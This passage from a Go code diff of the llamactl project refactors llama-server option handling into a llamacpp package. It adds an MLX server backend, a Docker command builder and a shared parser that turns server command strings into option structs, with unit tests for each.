var values []string
for j := 0; j < field.Len(); j++ {
values = append(values, field.Index(j).String())
}
args = append(args, "--"+flagName, strings.Join(values, ","))
}
}
}
}
return args
}
// BuildDockerCommand builds a Docker command with the specified configuration and arguments
func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
// Start with configured Docker arguments (should include "run", "--rm", etc.)
dockerArgs := make([]string, len(backendConfig.Docker.Args))
copy(dockerArgs, backendConfig.Docker.Args)
// Add environment variables
for key, value := range backendConfig.Docker.Environment {
dockerArgs = append(dockerArgs, "-e", fmt.Sprintf("%s=%s", key, value))
}
// Add image name
dockerArgs = append(dockerArgs, backendConfig.Docker.Image)
// Add backend args and instance args
dockerArgs = append(dockerArgs, backendConfig.Args...)
dockerArgs = append(dockerArgs, instanceArgs...)
return "docker", dockerArgs, nil
}

View File

@@ -1,12 +1,34 @@
package llamactl
package llamacpp
import (
"encoding/json"
"llamactl/pkg/backends"
"reflect"
"strconv"
"strings"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
}
type LlamaServerOptions struct {
// Common params
VerbosePrompt bool `json:"verbose_prompt,omitempty"`
@@ -15,12 +37,12 @@ type LlamaServerOptions struct {
CPUMask string `json:"cpu_mask,omitempty"`
CPURange string `json:"cpu_range,omitempty"`
CPUStrict int `json:"cpu_strict,omitempty"`
Priority int `json:"priority,omitempty"`
Prio int `json:"prio,omitempty"`
Poll int `json:"poll,omitempty"`
CPUMaskBatch string `json:"cpu_mask_batch,omitempty"`
CPURangeBatch string `json:"cpu_range_batch,omitempty"`
CPUStrictBatch int `json:"cpu_strict_batch,omitempty"`
PriorityBatch int `json:"priority_batch,omitempty"`
PrioBatch int `json:"prio_batch,omitempty"`
PollBatch int `json:"poll_batch,omitempty"`
CtxSize int `json:"ctx_size,omitempty"`
Predict int `json:"predict,omitempty"`
@@ -83,7 +105,7 @@ type LlamaServerOptions struct {
Seed int `json:"seed,omitempty"`
SamplingSeq string `json:"sampling_seq,omitempty"`
IgnoreEOS bool `json:"ignore_eos,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
Temperature float64 `json:"temp,omitempty"`
TopK int `json:"top_k,omitempty"`
TopP float64 `json:"top_p,omitempty"`
MinP float64 `json:"min_p,omitempty"`
@@ -110,7 +132,7 @@ type LlamaServerOptions struct {
JSONSchema string `json:"json_schema,omitempty"`
JSONSchemaFile string `json:"json_schema_file,omitempty"`
// Server/Example-specific params
// Example-specific params
NoContextShift bool `json:"no_context_shift,omitempty"`
Special bool `json:"special,omitempty"`
NoWarmup bool `json:"no_warmup,omitempty"`
@@ -150,17 +172,15 @@ type LlamaServerOptions struct {
NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"`
SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"`
// Speculative decoding params
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
DraftMax int `json:"draft_max,omitempty"`
DraftMin int `json:"draft_min,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
// Audio/TTS params
ModelVocoder string `json:"model_vocoder,omitempty"`
@@ -199,62 +219,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// Handle alternative field names
fieldMappings := map[string]string{
// Official llama-server short forms from the documentation
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict, --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"s": "seed", // -s, --seed SEED
"temp": "temperature", // --temp N
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
// Common params
"t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict N
"n-predict": "predict", // --n-predict N
"b": "batch_size", // -b, --batch-size N
"ub": "ubatch_size", // -ub, --ubatch-size N
"fa": "flash_attn", // -fa, --flash-attn
"e": "escape", // -e, --escape
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N
"np": "parallel", // -np, --parallel N
"dev": "device", // -dev, --device <dev1,dev2,..>
"ot": "override_tensor", // --override-tensor, -ot
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"n-gpu-layers": "gpu_layers", // --n-gpu-layers N
"sm": "split_mode", // -sm, --split-mode
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mg": "main_gpu", // -mg, --main-gpu INDEX
"m": "model", // -m, --model FNAME
"mu": "model_url", // -mu, --model-url MODEL_URL
"hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hff": "hf_file", // -hff, --hf-file FILE
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"hft": "hf_token", // -hft, --hf-token TOKEN
"v": "verbose", // -v, --verbose, --log-verbose
"log-verbose": "verbose", // --log-verbose
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"log-verbosity": "verbosity", // --log-verbosity N
// Sampling params
"s": "seed", // -s, --seed SEED
"l": "logit_bias", // -l, --logit-bias
"j": "json_schema", // -j, --json-schema SCHEMA
"jf": "json_schema_file", // -jf, --json-schema-file FILE
// Example-specific params
"sp": "special", // -sp, --special
"cb": "cont_batching", // -cb, --cont-batching
"nocb": "no_cont_batching", // -nocb, --no-cont-batching
"a": "alias", // -a, --alias STRING
"embeddings": "embedding", // --embeddings
"rerank": "reranking", // --reranking
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"draft": "draft-max", // -draft, --draft-max N
"draft-n": "draft-max", // --draft-n-max N
"draft-n-min": "draft_min", // --draft-n-min N
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"n-gpu-layers-draft": "gpu_layers_draft", // --n-gpu-layers-draft N
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
}
// Process alternative field names
@@ -304,62 +337,31 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
var args []string
// Llama uses multiple flags for arrays by default (not comma-separated)
// Use package-level multiValuedFlags variable
return backends.BuildCommandArgs(o, multiValuedFlags)
}
v := reflect.ValueOf(o).Elem()
t := v.Type()
func (o *LlamaServerOptions) BuildDockerArgs() []string {
// For llama, Docker args are the same as normal args
return o.BuildCommandArgs()
}
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
executableNames := []string{"llama-server"}
var subcommandNames []string // Llama has no subcommands
// Use package-level multiValuedFlags variable
// Skip unexported fields
if !field.CanInterface() {
continue
}
// Get the JSON tag to determine the flag name
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Remove ",omitempty" from the tag
flagName := jsonTag
if commaIndex := strings.Index(jsonTag, ","); commaIndex != -1 {
flagName = jsonTag[:commaIndex]
}
// Convert snake_case to kebab-case for CLI flags
flagName = strings.ReplaceAll(flagName, "_", "-")
// Add the appropriate arguments based on field type and value
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
// Handle []string fields
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
}
}
var llamaOptions LlamaServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
return nil, err
}
return args
return &llamaOptions, nil
}

View File

@@ -1,17 +1,16 @@
package llamactl_test
package llamacpp_test
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends/llamacpp"
"reflect"
"slices"
"testing"
llamactl "llamactl/pkg"
)
func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
Host: "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct {
name string
options llamactl.LlamaServerOptions
options llamacpp.LlamaServerOptions
expected []string
excluded []string
}{
{
name: "verbose true",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
},
expected: []string{"--verbose"},
},
{
name: "verbose false",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: false,
},
excluded: []string{"--verbose"},
},
{
name: "multiple booleans",
options: llamactl.LlamaServerOptions{
options: llamacpp.LlamaServerOptions{
Verbose: true,
FlashAttn: true,
Mlock: false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
}
func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 8080,
Threads: 4,
CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
args := options.BuildCommandArgs()
expectedPairs := map[string]string{
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temperature": "0.7",
"--top-k": "40",
"--top-p": "0.9",
"--port": "8080",
"--threads": "4",
"--ctx-size": "2048",
"--gpu-layers": "16",
"--temp": "0.7",
"--top-k": "40",
"--top-p": "0.9",
}
for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
}
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Port: 0, // Should be excluded
Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
}
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
}
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args
}
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion
options := llamactl.LlamaServerOptions{
options := llamacpp.LlamaServerOptions{
CtxSize: 4096,
GPULayers: 32,
ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"verbose": true,
"ctx_size": 4096,
"gpu_layers": 32,
"temperature": 0.7
"temp": 0.7
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct {
name string
jsonData string
checkFn func(llamactl.LlamaServerOptions) error
checkFn func(llamacpp.LlamaServerOptions) error
}{
{
name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
}
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "context size alternatives",
jsonData: `{"c": 2048}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
}
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
}
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
}
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{
name: "temperature alternatives",
jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamactl.LlamaServerOptions) error {
checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
}
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil {
t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
"dry_sequence_breaker": [".", "!", "?"]
}`
var options llamactl.LlamaServerOptions
var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options)
if err != nil {
t.Fatalf("Unmarshal failed: %v", err)
@@ -379,6 +378,121 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
}
}
func TestParseLlamaCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `llama-server --model test.gguf --api-key "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "llama-server ---model test.gguf",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseLlamaCommandValues(t *testing.T) {
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
}
if result.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
}
if result.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
}
if !result.Verbose {
t.Errorf("expected verbose to be true")
}
if !result.NoMmap {
t.Errorf("expected no_mmap to be true")
}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Lora) != 2 {
t.Errorf("expected 2 lora adapters, got %d", len(result.Lora))
}
expected := []string{"adapter1.bin", "adapter2.bin"}
for i, v := range expected {
if result.Lora[i] != v {
t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i])
}
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)

56
pkg/backends/mlx/mlx.go Normal file
View File

@@ -0,0 +1,56 @@
package mlx
import (
"llamactl/pkg/backends"
)
type MlxServerOptions struct {
// Basic connection options
Model string `json:"model,omitempty"`
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and adapter options
AdapterPath string `json:"adapter_path,omitempty"`
DraftModel string `json:"draft_model,omitempty"`
NumDraftTokens int `json:"num_draft_tokens,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
// Logging and templates
LogLevel string `json:"log_level,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
UseDefaultChatTemplate bool `json:"use_default_chat_template,omitempty"`
ChatTemplateArgs string `json:"chat_template_args,omitempty"` // JSON string
// Sampling defaults
Temp float64 `json:"temp,omitempty"`
TopP float64 `json:"top_p,omitempty"`
TopK int `json:"top_k,omitempty"`
MinP float64 `json:"min_p,omitempty"`
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}
return &mlxOptions, nil
}

View File

@@ -0,0 +1,157 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
},
{
name: "mixed flag formats",
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
},
{
name: "quoted strings",
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := mlx.ParseMlxCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseMlxCommandValues(t *testing.T) {
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
result, err := mlx.ParseMlxCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
}
if result.Port != 8080 {
t.Errorf("expected port 8080, got %d", result.Port)
}
if result.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", result.Temp)
}
if !result.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if result.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := &mlx.MlxServerOptions{
Model: "/test/model.mlx",
Host: "127.0.0.1",
Port: 8080,
Temp: 0.7,
TopP: 0.9,
TopK: 40,
MaxTokens: 2048,
TrustRemoteCode: true,
LogLevel: "DEBUG",
ChatTemplate: "custom template",
}
args := options.BuildCommandArgs()
// Check that all expected flags are present
expectedFlags := map[string]string{
"--model": "/test/model.mlx",
"--host": "127.0.0.1",
"--port": "8080",
"--log-level": "DEBUG",
"--chat-template": "custom template",
"--temp": "0.7",
"--top-p": "0.9",
"--top-k": "40",
"--max-tokens": "2048",
}
for i := 0; i < len(args); i++ {
if args[i] == "--trust-remote-code" {
continue // Boolean flag with no value
}
if args[i] == "--use-default-chat-template" {
continue // Boolean flag with no value
}
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
if args[i+1] != expectedValue {
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
}
}
}
// Check boolean flags
foundTrustRemoteCode := false
for _, arg := range args {
if arg == "--trust-remote-code" {
foundTrustRemoteCode = true
}
}
if !foundTrustRemoteCode {
t.Errorf("expected --trust-remote-code flag to be present")
}
}

213
pkg/backends/parser.go Normal file
View File

@@ -0,0 +1,213 @@
package backends
import (
"encoding/json"
"fmt"
"path/filepath"
"regexp"
"strconv"
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
return fmt.Errorf("command cannot be empty")
}
// Extract arguments and positional model
args, modelFromPositional, err := extractArgs(command, executableNames, subcommandNames)
if err != nil {
return err
}
// Parse flags into map
options, err := parseFlags(args, multiValuedFlags)
if err != nil {
return err
}
// If we found a positional model and no --model flag was provided, set the model
if modelFromPositional != "" {
if _, hasModelFlag := options["model"]; !hasModelFlag {
options["model"] = modelFromPositional
}
}
// Convert to target struct via JSON
jsonData, err := json.Marshal(options)
if err != nil {
return fmt.Errorf("failed to marshal options: %w", err)
}
if err := json.Unmarshal(jsonData, target); err != nil {
return fmt.Errorf("failed to unmarshal to target: %w", err)
}
return nil
}
// normalizeCommand handles multiline commands with backslashes
func normalizeCommand(command string) string {
re := regexp.MustCompile(`\\\s*\n\s*`)
normalized := re.ReplaceAllString(command, " ")
re = regexp.MustCompile(`\s+`)
return strings.TrimSpace(re.ReplaceAllString(normalized, " "))
}
// extractArgs extracts arguments from command, removing executable and subcommands
// Returns: args, modelFromPositional, error
func extractArgs(command string, executableNames []string, subcommandNames []string) ([]string, string, error) {
// Check for unterminated quotes
if strings.Count(command, `"`)%2 != 0 || strings.Count(command, `'`)%2 != 0 {
return nil, "", fmt.Errorf("unterminated quoted string")
}
tokens := strings.Fields(command)
if len(tokens) == 0 {
return nil, "", fmt.Errorf("no tokens found")
}
// Skip executable
start := 0
firstToken := tokens[0]
// Check for executable name (with or without path)
if strings.Contains(firstToken, string(filepath.Separator)) {
baseName := filepath.Base(firstToken)
for _, execName := range executableNames {
if strings.HasSuffix(strings.ToLower(baseName), strings.ToLower(execName)) {
start = 1
break
}
}
} else {
for _, execName := range executableNames {
if strings.EqualFold(firstToken, execName) {
start = 1
break
}
}
}
// Skip subcommand if present
if start < len(tokens) {
for _, subCmd := range subcommandNames {
if strings.EqualFold(tokens[start], subCmd) {
start++
break
}
}
}
// Handle case where command starts with subcommand (no executable)
if start == 0 {
for _, subCmd := range subcommandNames {
if strings.EqualFold(firstToken, subCmd) {
start = 1
break
}
}
}
args := tokens[start:]
// Extract first positional argument (model) if present and not a flag
var modelFromPositional string
if len(args) > 0 && !strings.HasPrefix(args[0], "-") {
modelFromPositional = args[0]
args = args[1:] // Remove the model from args to process remaining flags
}
return args, modelFromPositional, nil
}
// parseFlags parses command line flags into a map
